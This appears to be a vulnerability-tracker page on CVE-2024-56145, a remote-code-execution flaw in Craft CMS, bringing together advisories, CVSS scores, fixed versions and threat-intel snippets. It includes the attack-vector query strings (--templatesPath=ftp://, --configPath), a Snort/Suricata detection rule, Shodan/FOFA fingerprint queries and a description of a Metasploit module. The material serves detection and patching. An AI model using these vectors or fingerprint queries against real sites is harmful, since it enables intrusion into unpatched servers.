CVE-2024-56145
published 2024-12-18CVE-2024-56145: Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Users of affected versions are affected by this…
PriorityP198critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2025-06-23
Exploited in the wild
EPSS
97.45%
99.9th percentile
Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Users of affected versions are affected by this vulnerability if their php.ini configuration has `register_argc_argv` enabled. For these users an unspecified remote code execution vector is present. Users are advised to update to version 3.9.14, 4.13.2, or 5.5.2. Users unable to upgrade should disable `register_argc_argv` to mitigate the issue.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| craftcms | cms | — | — |
| craftcms | cms | — | — |
| craftcms | cms | — | — |
| craftcms | cms | >= 3.0.0 < 3.9.14 | 3.9.14 |
| craftcms | cms | >= 4.0.0-RC1 < 4.13.2 | 4.13.2 |
| craftcms | cms | >= 5.0.0-RC1 < 5.5.2 | 5.5.2 |
| craftcms | craft_cms | >= 3.0.0 < 3.9.14 | 3.9.14 |
| craftcms | craft_cms | >= 4.0.0 < 4.13.2 | 4.13.2 |
| craftcms | craft_cms | >= 5.0.0 < 5.5.2 | 5.5.2 |
Detection & IOCsextracted from sources · hover to see the quote
url?--configPath=/nuclei_test/{{nonce}}
command?--templatesPath=ftp://
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Craft CMS Template Path Injection RCE (CVE-2024-56145)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"|3f 2d 2d|templatesPath|3d|ftp|3a 2f 2f|"; fast_pattern; reference:cve,2024-56145; reference:url,www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms; classtype:attempted-admin; sid:2058436; rev:1; metadata:affected_product CraftCMS, attack_target Web_Server, tls_state TLSDecrypt, created_at 2024_12_20, cve CVE_2024_56145, deployment Perimeter, deployment Internal, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2024_12_20; target:dest_ip;)
- →Look for HTTP GET requests containing `--templatesPath` or `--configPath` query parameters in the URI, which are the primary exploitation vectors for this vulnerability. ↗
- →Nuclei PoC probe returns HTTP 503 with body containing `mkdir()`, `Permission denied`, or `No such file or directory` — use these response strings to identify exploitation attempts.
- →Shodan/FOFA fingerprinting: Craft CMS instances can be identified via `http.html:"craftcms"`, `http.favicon.hash:"-47932290"`, or `icon_hash=-47932290` — use these to scope exposure.
- →The Metasploit module exploits the vulnerability by abusing the `--templatesPath` argument to load arbitrary templates via FTP, leading to RCE — monitor for outbound FTP connections from web server processes. ↗
- →EPSS score of 0.94049 (99.9th percentile) and confirmed KEV listing indicate active in-the-wild exploitation — prioritize detection and patching accordingly.
- ·Exploitation requires `register_argc_argv` to be enabled in php.ini. Instances with this setting disabled are NOT vulnerable — scope detection rules accordingly. ↗
- ·The Snort/ET rule targets TLS-decrypted traffic (deployment tags: SSLDecrypt, TLSDecrypt) — the rule will not fire on encrypted HTTPS traffic without TLS inspection in place.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.09.3CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck9.3CRITICAL
cisa9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Craft CMS has potential RCE when PHP `register_argc_argv` config setting is enabled
osv·2024-12-18
CVE-2024-56145 [CRITICAL] Craft CMS has potential RCE when PHP `register_argc_argv` config setting is enabled
Craft CMS has potential RCE when PHP `register_argc_argv` config setting is enabled
### Impact
You are affected if your php.ini configuration has `register_argc_argv` enabled.
### Patches
Update to 3.9.14, 4.13.2, or 5.5.2.
### Workarounds
If you can't upgrade yet, and `register_argc_argv` is enabled, you can disable it to mitigate the issue.
GHSA
Craft CMS has potential RCE when PHP `register_argc_argv` config setting is enabled
ghsa·2024-12-18
CVE-2024-56145 [CRITICAL] CWE-78 Craft CMS has potential RCE when PHP `register_argc_argv` config setting is enabled
Craft CMS has potential RCE when PHP `register_argc_argv` config setting is enabled
### Impact
You are affected if your php.ini configuration has `register_argc_argv` enabled.
### Patches
Update to 3.9.14, 4.13.2, or 5.5.2.
### Workarounds
If you can't upgrade yet, and `register_argc_argv` is enabled, you can disable it to mitigate the issue.
VulnCheck
Craft CMS Code Injection Vulnerability
vulncheck·2024·CVSS 9.3
CVE-2024-56145 [CRITICAL] CWE-94 Craft CMS Code Injection Vulnerability
Craft CMS Code Injection Vulnerability
Craft CMS contains a code injection vulnerability. Users with affected versions are vulnerable to remote code execution if their php.ini configuration has `register_argc_argv` enabled.
Affected: Craft CMS Craft CMS
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.trendmicro.com/en_us/research/25/e/earth-lamia.html; https://fortiguard.fortinet.com/outbreak-alert/earth-lamia-apt-attack; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://cyble.com/blog/weekly-cyble-vulnerability-blog/; https://assets.recordedfuture.com/insikt-report-pdfs/202
CISA
Craft CMS Code Injection Vulnerability
cisa·2025-06-02·CVSS 9.3
CVE-2024-56145 [CRITICAL] CWE-94 Craft CMS Code Injection Vulnerability
Vulnerability: Craft CMS Code Injection Vulnerability
Affected: Craft CMS Craft CMS
Craft CMS contains a code injection vulnerability. Users with affected versions are vulnerable to remote code execution if their php.ini configuration has `register_argc_argv` enabled.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://github.com/craftcms/cms/security/advisories/GHSA-2p6p-9rc9-62j9 ; https://nvd.nist.gov/vuln/detail/CVE-2024-56145
Remediation Due Date: 2025-06-23
Suricata
ET WEB_SPECIFIC_APPS Craft CMS Template Path Injection RCE (CVE-2024-56145)
suricata·2024-12-20·CVSS 9.3
CVE-2024-56145 [CRITICAL] ET WEB_SPECIFIC_APPS Craft CMS Template Path Injection RCE (CVE-2024-56145)
ET WEB_SPECIFIC_APPS Craft CMS Template Path Injection RCE (CVE-2024-56145)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Craft CMS Template Path Injection RCE (CVE-2024-56145)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"|3f 2d 2d|templatesPath|3d|ftp|3a 2f 2f|"; fast_pattern; reference:cve,2024-56145; reference:url,www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms; classtype:attempted-admin; sid:2058436; rev:1; metadata:affected_product CraftCMS, attack_target Web_Server, tls_state TLSDecrypt, created_at 2024_12_20, cve CVE_2024_56145, deployment Perimeter, deployment Internal, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2024_1
Nuclei
Craft CMS - Remote Code Execution via Template Path Manipulation
nuclei·CVSS 9.3
CVE-2024-56145 [CRITICAL] Craft CMS - Remote Code Execution via Template Path Manipulation
Craft CMS - Remote Code Execution via Template Path Manipulation
This template identifies a critical Remote Code Execution (RCE) vulnerability in Craft CMS, identified as GHSA-2p6p-9rc9-62j9.
The vulnerability exists due to improper handling of the `--templatesPath` query parameter, allowing attackers to execute arbitrary code by referencing malicious Twig templates.
Template:
id: CVE-2024-56145
info:
name: Craft CMS - Remote Code Execution via Template Path Manipulation
author: jackhax
severity: critical
description: |
This template identifies a critical Remote Code Execution (RCE) vulnerability in Craft CMS, identified as GHSA-2p6p-9rc9-62j9.
The vulnerability exists due to improper handling of the `--templatesPath` query parameter, allowing attackers to execute arbitrary code by ref
Metasploit
Craft CMS Twig Template Injection RCE via FTP Templates Path
metasploit
Craft CMS Twig Template Injection RCE via FTP Templates Path
Craft CMS Twig Template Injection RCE via FTP Templates Path
This module exploits a Twig template injection vulnerability in Craft CMS by abusing the --templatesPath argument. The vulnerability allows arbitrary template loading via FTP, leading to Remote Code Execution (RCE).
Bleepingcomputer
CISA warns of ConnectWise ScreenConnect bug exploited in attacks
blogs_bleepingcomputer·2025-06-03·CVSS 9.8
[CRITICAL] CISA warns of ConnectWise ScreenConnect bug exploited in attacks
## CISA warns of ConnectWise ScreenConnect bug exploited in attacks
## Ionut Ilascu
CISA is alerting federal agencies in the U.S. of hackers exploiting a recently patched ScreenConnect vulnerability that could lead to executing remote code on the server.
The agency is warning that four other security problems affecting ASUS routers and the Craft content management system (CMS) are also actively exploited.
## Improper authentication in ConnectWise ScreenConnect
On April 24, ConnectWise addressed the security issue, tracked as CVE-2025-3935, stating that the vulnerability could be exploited for a ViewState code injection attack.
The vendor notes that ASP.NET Web Forms rely on the ViewState component to preserve page and control state using base64-encoded data that is protected by machi
Trendmicro
Earth Lamia Develops Custom Arsenal to Target Multiple Industries
blogs_trendmicro·2025-05-27
Earth Lamia Develops Custom Arsenal to Target Multiple Industries
APT & Targeted Attacks
# Earth Lamia Develops Custom Arsenal to Target Multiple Industries
Trend™ Research has been tracking an active APT threat actor named Earth Lamia, targeting multiple industries in Brazil, India and Southeast Asia countries at least since 2023. The threat actor primarily exploits vulnerabilities in web applications to gain access to targeted organizations.
By: Joseph C Chen
2025/05/27
Read time: ( words)
Save to Folio
Summary
- Trend Research has identified Earth Lamia as an APT threat actor that exploits vulnerabilities in web applications to gain access to organizations, using various techniques for data exfiltration.
- Earth Lamia develops and customizes hacking tools to evade detection, such as PULSEPACK and BypassBoss.
- Earth Lamia has primarily targeted
Recorded Future
H1 2025 Malware and Vulnerability Trends
blogs_recorded_future
H1 2025 Malware and Vulnerability Trends
## H1 2025 Malware and Vulnerability Trends
## Executive Summary
The first half of 2025 (H1 2025) reflected a rapidly evolving threat landscape defined by the convergence of persistent legacy threats and advanced new tactics.
The total disclosed CVEs increased by 16% from H1 2024, and threat actors exploited 161 vulnerabilities with assigned CVEs, with nearly half linked to malware or ransomware campaigns. Microsoft remained the most targeted vendor, while edge security and gateway devices continued to be high-value targets for initial access. Malware activity was similarly dynamic: while law enforcement takedowns disrupted major players like LummaC2, a resurgence of legacy malware such as Sality indicated that old tools still offer utility for modern actors. Remote access trojans (RATs
Recorded Future
H1 2025 Malware and Vulnerability Trends
blogs_recorded_future
H1 2025 Malware and Vulnerability Trends
# H1 2025 Malware and Vulnerability Trends
## Executive Summary
The first half of 2025 (H1 2025) reflected a rapidly evolving threat landscape defined by the convergence of persistent legacy threats and advanced new tactics.
The total disclosed CVEs increased by 16% from H1 2024, and threat actors exploited 161 vulnerabilities with assigned CVEs, with nearly half linked to malware or ransomware campaigns. Microsoft remained the most targeted vendor, while edge security and gateway devices continued to be high-value targets for initial access. Malware activity was similarly dynamic: while law enforcement takedowns disrupted major players like LummaC2, a resurgence of legacy malware such as Sality indicated that old tools still offer utility for modern actors. Remote access trojans (RATs)
2024-12-18
Published
2025-06-02
Added to CISA KEV
Exploited in the wild